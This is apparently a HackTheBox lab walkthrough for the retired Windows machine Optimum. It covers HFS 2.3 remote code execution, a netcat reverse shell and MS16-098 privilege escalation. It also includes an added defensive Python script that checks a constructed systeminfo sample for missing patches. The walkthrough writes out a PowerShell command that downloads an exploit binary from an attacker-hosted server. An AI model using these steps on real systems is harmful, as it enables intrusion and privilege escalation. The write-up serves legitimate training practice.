Today we’re going to solve Optimum, a retired Windows machine from HackTheBox. Without wasting any more time, let’s start with the walkthrough.
Step 1: nmap scan.
Okay, so there’s only one port open: port 80. Let’s see what’s running on it.
From the nmap service scan with -sV we can see that HFS (HTTP File Server) version 2.3 is running on the machine. Let’s search the internet for an HFS 2.3 exploit, if one is available.
Let’s take the first exploit available on exploit-db. It is an RCE (remote code execution) exploit.
After downloading it, edit the local IP and local port in the exploit.
As the exploit notes, we also need to host nc.exe in a directory served on port 80 so it can be downloaded onto the machine.
Now we are all set for the exploit to go live.
Before running the exploit you just downloaded, set up a netcat listener in a new tab on the port specified in the exploit, i.e. port 8080.
Then run the exploit from the previous tab.
Cool, we got a shell.
Now cd and grab user.txt. We need the root flag as well; for that we will run Windows Exploit Suggester, which needs the output of systeminfo.
Cool, we got the system info.
Now download Windows Exploit Suggester from GitHub.
Before running it, copy the systeminfo output into a file named systeminfo.txt.
Okay, now we are all set to run the script.
We will use the command below; the GitHub page will help with any issues.
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
The 2014-06-06 database filename needs to be changed to whatever you got after running the update step shown on the GitHub page, and the systeminfo.txt file needs to be in the same directory as the script.
Now let’s run the script.
For me the updated database is 2019-08-01-mssb.xls, so my command will be:
./windows-exploit-suggester.py --database 2019-08-01-mssb.xls --systeminfo systeminfo.txt
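The suggester above works by reading the OS name and installed hotfixes out of the systeminfo output and comparing them against a bulletin table. The following is an added example (not the suggester's own code, nor anything from the original post) that does the same patch-gap check in miniature on a constructed systeminfo sample: it parses the fields the check needs, and then reports bulletins that apply to the OS but whose KB is not installed. The bulletin table and its KB numbers are constructed placeholders standing in for the real -mssb.xls database.

```python
import re

# Constructed sample of `systeminfo` output, trimmed to the fields the check
# needs. It is not the real output from the machine on the page.
SAMPLE_SYSTEMINFO = """\
Host Name:                 SAMPLE-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed bulletin table standing in for the -mssb.xls database. The KB
# numbers are placeholders, not the real patch ids for these bulletins.
BULLETINS = [
    {"bulletin": "MS16-098", "kb": "KB9000098",
     "os": r"Windows Server 2012 R2|Windows 8\.1",
     "title": "placeholder: integer overflow / privilege escalation"},
    {"bulletin": "MS-SAMPLE-INSTALLED", "kb": "KB2919355",
     "os": r"Windows Server 2012 R2",
     "title": "placeholder: patch already present in the sample"},
    {"bulletin": "MS-SAMPLE-OTHER-OS", "kb": "KB9000001",
     "os": r"Windows 7",
     "title": "placeholder: bulletin for a different OS"},
]

# "[01]: KB2919355" style hotfix lines
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
# "OS Name:   Microsoft Windows ..." style header fields
FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s*(.+?)\s*$", re.MULTILINE)


def parse_systeminfo(text):
    """Extract OS name, version, architecture and installed hotfixes from systeminfo output."""
    fields = {key: value for key, value in FIELD_RE.findall(text)}
    version = fields.get("OS Version", "")
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": version.split()[0] if version else "",
        "arch": "x64" if "x64" in fields.get("System Type", "") else "x86",
        "hotfixes": {kb.upper() for kb in HOTFIX_RE.findall(text)},
    }


def missing_patches(info, bulletins):
    """Return the ids of bulletins that apply to this OS and whose KB is not installed."""
    return [
        b["bulletin"]
        for b in bulletins
        if re.search(b["os"], info["os_name"]) and b["kb"].upper() not in info["hotfixes"]
    ]


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{info['os_name']} {info['os_version']} ({info['arch']}), "
          f"{len(info['hotfixes'])} hotfixes installed")
    for bulletin in missing_patches(info, BULLETINS):
        print("missing:", bulletin)
```

On the constructed sample this reports only MS16-098 as missing: the second entry's KB is already installed and the third applies to a different OS. Running it against a real systeminfo.txt is the same idea the suggester applies across the full bulletin spreadsheet, and from a defender's side it is the quickest way to confirm whether a host is actually missing a given patch before anything else is attempted.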
The script’s output lists a lot of exploits; you need to filter them down to what you want.
For example, the first one is a DoS attack, which we don’t need.
After trying and filtering, I came across the MS16-098 integer overflow exploit.
Cool, we got the exploit. Download the binary directly, or compile it yourself if the remote system has a gcc compiler.
I am downloading the binary, i.e. the .exe.
Now, from the folder containing the download, run a Python web server on port 80 (it must be port 80) using python -m SimpleHTTPServer 80,
and from the remote machine’s shell use PowerShell to download the exploit exe onto the remote system:
powershell wget http://ATTACKER IP/41020.exe -outfile privesc.exe
OK, let’s run dir and check whether the exploit is there.
Now, the time has come to run the exploit privesc.exe.
Boom, we are now running as nt authority\system.
Now cd to root.txt and claim your flag.